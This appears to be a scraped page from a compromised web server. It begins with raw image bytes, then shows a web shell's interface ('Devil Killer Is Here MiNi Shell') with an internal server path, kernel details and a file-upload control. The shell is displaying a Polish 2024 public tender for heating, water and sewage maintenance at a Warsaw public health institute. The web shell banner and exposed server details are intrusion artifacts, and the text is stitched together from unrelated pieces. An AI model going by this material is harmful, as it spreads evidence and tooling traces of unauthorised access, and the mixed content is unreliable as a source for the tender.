JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240805/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240805/0044520401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa wykonywania przeglądów i konserwacji, niezbędnych napraw instalacji centralnego ogrzewania z węzłami cieplnymi włącznie, instalacji wodociągowej oraz instalacji kanalizacyjnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NARODOWY INSTYTUT ZDROWIA PUBLICZNEGO PZH - PAŃSTWOWY INSTYTUT BADAWCZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288461</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Chocimska 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-791</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@pzh.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.pzh.gov.pl/public/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa wykonywania przeglądów i konserwacji, niezbędnych napraw instalacji centralnego ogrzewania z węzłami cieplnymi włącznie, instalacji wodociągowej oraz instalacji kanalizacyjnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4cd1ab4e-2c88-4032-8563-1c9a82cd8471</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00445204</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/pzh <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/pn/pzh</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wskazane w pkt 12 Rozdziału I SWZ<br/>2. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursu oraz rozporządzeniu Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać Zamawiający od Wykonawcy.<br/>3. Oferta powinna być sporządzona w języku polskim w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym pod rygorem nieważności. Wykonawca składa<br/>ofertę (w formacie danych: .doc, .docx,.pdf) wraz z załącznikami za pośrednictwem platformy zakupowej pod adresem:<br/>https://www.platformazakupowa.pl/pn/pzh.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">pkt 23 Rozdziału I SWZ– Informacja o zasadach przetwarzania danych osobowych przez Narodowy Instytut Zdrowia Publicznego – Państwowy Instytut Badawczy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">pkt 23 Rozdziału I SWZ– Informacja o zasadach przetwarzania danych osobowych przez Narodowy Instytut Zdrowia Publicznego – Państwowy Instytut Badawczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D.DZP.262.752.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 521352,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Usługa utrzymania w sprawności technicznej poprzez systematyczne wykonywanie przeglądów i konserwacji, niezbędnych napraw, w szczególności usuwanie awarii instalacji centralnego ogrzewania z węzłami cieplnymi włącznie, instalacji wodociągowej (woda zimna i ciepła, cyrkulacja), oraz instalacji kanalizacyjnej w budynkach będących w posiadaniu Narodowego Instytutu Zdrowia Publicznego - PZH -Państwowy Instytut Badawczy.<br/>2. W ramach realizacji przedmiotu zamówienia Zamawiający przewiduje zamówienie podstawowe i zamówienie objęte prawem opcji.<br/><br/>I.	Zamówienie podstawowe:<br/>Usługa systematycznego wykonywania przeglądów i konserwacji, instalacji centralnego ogrzewania z węzłami cieplnymi włącznie, instalacji wodociągowej (woda zimna i ciepła, cyrkulacja), oraz instalacji kanalizacyjnej w budynkach Zamawiającego obejmująca:<br/>1) stałą gotowość do podjęcia wszelkich interwencji związanych z nieprawidłową pracą instalacji <br/>i awariami np. usuniecie rozszczelnień w instalacji hydraulicznej lub w urządzeniach sanitarnych, wymiana uszczelek, głowic itp.,<br/>2) wymianę odcinków rurociągów do 2 m (dotyczy usuwania awarii występujących punktowo),<br/>3) wymianę zaworów czerpalnych i baterii (do 5 szt. w miesiącu), osprzętu punktów poboru wody:<br/>wężyki, zaworki, czujniki, termometry i inne.,<br/>4) wymianę misek ustępowych, umywalek oraz pisuarów, brodzików, wanien itp. (bez materiałów zasadniczych – dostaw armatury),<br/>5) wymianę syfonów, kratek ściekowych, dokręcanie złącz, wykazanie należytej dbałości <br/>o prawidłowy stan techniczny innych elementów instalacji hydraulicznej,<br/>6) czyszczenie lub wymianę filtrów wody w układach CO, CT oraz wody użytkowej,<br/>7) uruchomienia i wyłączenia węzłów cieplnych na początku/końcu sezonu grzewczego wraz<br/>z regulacją systemu ogrzewania - w kwietniu i październiku w trakcie obowiązywania umowy, naprawa izolacji termicznej rurociągów, odpowietrzanie instalacji CO, likwidacja przecieków, wymiana uszczelek, wymiana głowic termostatycznych i zaworów, regulatorów, obsługa pomp oraz innych elementów instalacji CO i CT,<br/>8) udrażnianie instalacji kanalizacyjnej (w tym do wód opadowych) za wyjątkiem specjalistycznej usługi „WUKO”.<br/>Zamówienie podstawowe rozliczane będzie ryczałtowo miesięcznie w stałej kwocie wskazanej przez Wykonawcę w ofercie.<br/>Materiały i części zamienne, niezbędne do wykonywania wyżej wymienionych usług w ramach zamówienia podstawowego dostarcza Wykonawca w ramach wynagrodzenia ryczałtowego.<br/><br/>2) Zamówienie w ramach prawa opcji:<br/> Naprawy dotyczące urządzeń i instalacji stanowiących przedmiot Usług w zakresie wykraczającym poza zakres zamówienia podstawowego określony w pkt I OPZ. <br/> Szczegółowe określenie zakresu przedmiotu zamówienia oraz warunków wykonania zawarte są w Rozdziale III (Opis Przedmiotu Zamówienia) i w Rozdziale IV (Projektowane Postanowienia Umowy) w sprawie zamówienia publicznego niniejszej SWZ oraz pozostałej dokumentacji przetargowej, która została zamieszczona na stronie internetowej prowadzonego postępowania (https://www.platformazakupowa.pl/pn/pzh). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający przewiduje możliwość udzielenia prawa opcji polegającego na świadczeniu usług określonych w punkcie II Opisu Przedmiotu Zamówienia, na warunkach opisanych w PPU.<br/>Zasady korzystania z prawa opcji: <br/>a) Maksymalna wartość opcji nie może przekroczyć 50 % wartości brutto całej kwoty wynagrodzenia o którym mowa w Umowie. <br/>b) Zamawiający ma prawo skorzystać z prawa opcji w całym okresie obowiązywania niniejszej Umowy, tj. przez okres 24 miesięcy od daty jej zawarcia a w przypadku wydłużenia okresu obowiązywania również w okresie przedłużonym. <br/>c) O zamiarze skorzystania z prawa opcji Zamawiający poinformuje Wykonawcę w formie pisemnej, lub elektronicznej pod rygorem nieważności. <br/>d) Zamawiający zastrzega możliwość skorzystania z całości, bądź wyłącznie części zamówienia opcjonalnego. W przypadku skorzystania z zamówienia opcjonalnego będzie ono rozliczane w oparciu przedstawiony kosztorys ofertowy Wykonawcy. <br/>e) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego. <br/>f) Nieskorzystanie przez Zamawiającego z prawa opcji nie rodzi po stronie Wykonawcy żadnych roszczeń w stosunku do Zamawiającego <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> W przypadku niewykorzystania kwoty maksymalnego wynagrodzenia określonej w § 7 ust.1 umowy w okresie 24 miesięcy od dnia jej podpisania, Zamawiający dopuszcza możliwość przedłużenia okresu obowiązywania umowy maksymalnie o 6 (sześć miesięcy) w stosunku do pierwotnie ustalonego okresu obowiązywania umowy, zarówno w zakresie Przeglądów, jak i Napraw. Przedłużenie okresu obowiązywania umowy wymaga zawarcia pisemnego aneksu do umowy. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">85</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena 1 rbh świadczenia usług przy zamówieniu objętym prawem opcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujące warunki udziału <br/>w postępowaniu w zakresie: <br/>A)	zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający wymaga na potwierdzenie spełnienia tego warunku, aby Wykonawca złożył dokument potwierdzający, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem w zakresie prowadzenia działalności gospodarczej w branży instalacyjno – sanitarnej nieprzerwanie od minimum trzech lat. <br/>UWAGA<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, powyższy warunek musi zostać spełniony przez jednego lub wszystkich wykonawców łącznie. <br/>B). W zakresie doświadczenia<br/>	1. Zamawiający wymaga, aby Wykonawca posiadał następujące doświadczenie: <br/>należycie wykonał a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, <br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 Usługi* wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa powyżej, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>* Za Usługi Zamawiający rozumie usługi o określonym poniżej zakresie i wartości: <br/>1) co najmniej trzy wykonane usługi polegające na wykonywaniu w budynkach o podwyższonym rygorze czystości (np. szpital, laboratorium, instytut badawczy) usług polegających na obsłudze instalacji hydraulicznych z których każda trwała co najmniej 6 miesięcy w ramach jednego kontraktu, których wartość każdej z usług nie była niższa niż 50 000,00 brutto PLN.<br/> Jeżeli zamówienia, o których mowa powyżej są wykonywane nadal, wartość wykonanej/zrealizowanej części zamówienia do upływu terminu składania ofert nie może być niższa niż jedno zamówienie <br/>o wartości niż 50 000,00 brutto PLN.<br/><br/>UWAGA<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz wykonawców polegających na zasobach innych podmiotów, powyższy warunek w zakresie doświadczenia może zostać spełniony przez jednego lub wszystkich wykonawców łącznie. <br/> W przypadku wartości usług wyrażonej w innej walucie, Zamawiający, w celu oceny spełnienia ww. warunku, dokona przeliczenia tych wartości wg. kursu z dnia opublikowania ogłoszenia o zamówieniu na podstawie Tabeli kursów średnich NBP publikowanych na stronie internetowej:<br/> http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx<br/><br/>C. Zdolności technicznej - w zakresie posiadania potencjału kadrowego: <br/>Wykonawca dysponuje nw. osobami zdolnymi do wykonywania zamówienia tj.<br/>1)	Minimum jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych - zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane;<br/>2)	Minimum jedną osobą posiadającą:<br/>a)	Uprawnienia do eksploatacji urządzeń grupa 1, 2 oraz 3 – D i E;<br/>b)	Uprawnienia (certyfikat dla przedsiębiorców) F-Gazy;<br/>c)	Świadectwo kwalifikacji wykonywania instalacji z miedzi;<br/>d)	Świadectwo kwalifikacji wykonywania instalacji z PP;<br/>e)	Autoryzację w zakresie montażu i serwisu kotłów gazowych, pomp ciepła i rozwiązań proekologicznych w instalacjach grzewczych;<br/>f)	Świadectwo znajomości urządzeń dla ciepłownictwa;<br/>g)	Certyfikat znajomości metody równoważenia hydraulicznego instalacji HVAC;<br/>h)	Znajomość zagadnień techniki pompowej w instalacjach grzewczych, chłodniczych <br/>i klimatyzacyjnych, projektowanie tych układów – potwierdzona stosownym certyfikatem;<br/>i)	Doświadczenie w pracy z regulatorami firmy SAMSON;<br/><br/>UWAGA:<br/>Zamawiający dopuszcza, w celu wykazania spełnienia warunków, łączenie zakresów określonych <br/>w punktach a-i przez więcej niż jedną osobę (Zamawiający wymaga jedynie aby zakresy były spełnione przez wykazywane osoby skierowane do realizacji zamówienia).<br/><br/>Certyfikaty i inne dokumenty wskazane w poszczególnych podpunktach punktu C będą żądane przez Zamawiającego na etapie przed podpisaniem umowy. W przypadku braku przekazania ww. dokumentów Zamawiający uzna to za uchylanie się Wykonawcy od podpisania umowy a w konsekwencji dokona badania spełnienia warunków udziału oraz braku podstaw do wykluczenia przez kolejnego <br/>z Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4)	Oświadczenie o aktualności informacji zawartych w oświadczeniu wykonawcy składanym na podstawie art. 125 ust. 1 Ustawy PZP, zgodnie z załącznikiem nr II.7 do SWZ.<br/>5)	Oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - zgodnie z załącznikiem nr II.8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	dokument potwierdzający, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem w zakresie prowadzenia działalności gospodarczej w branży instalacyjno – sanitarnej nieprzerwanie od minimum trzech lat.<br/>2)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, w raz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca <br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów oświadczenie wykonawcy w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>3)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia publicznego;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> -	OŚWIADCZENIE DOTYCZĄCE ZAKRESU WYKONYWANEGO ZAMÓWIENIA (ART. 117 UST 4 USTAWY PZP). - zobowiązanie do udostępnienia zasobów w przypadku w którym Wykonawca będzie polegał na zasobach podmiotu trzeciego<br/>-	pełnomocnictwo w przypadku składania oferty przez pełnomocnika. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> ROZDZIAŁ I SWZ pkt. 11 - Informacja dla Wykonawców, którzy wspólnie składają ofertę (konsorcja, spółki cywilne). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> 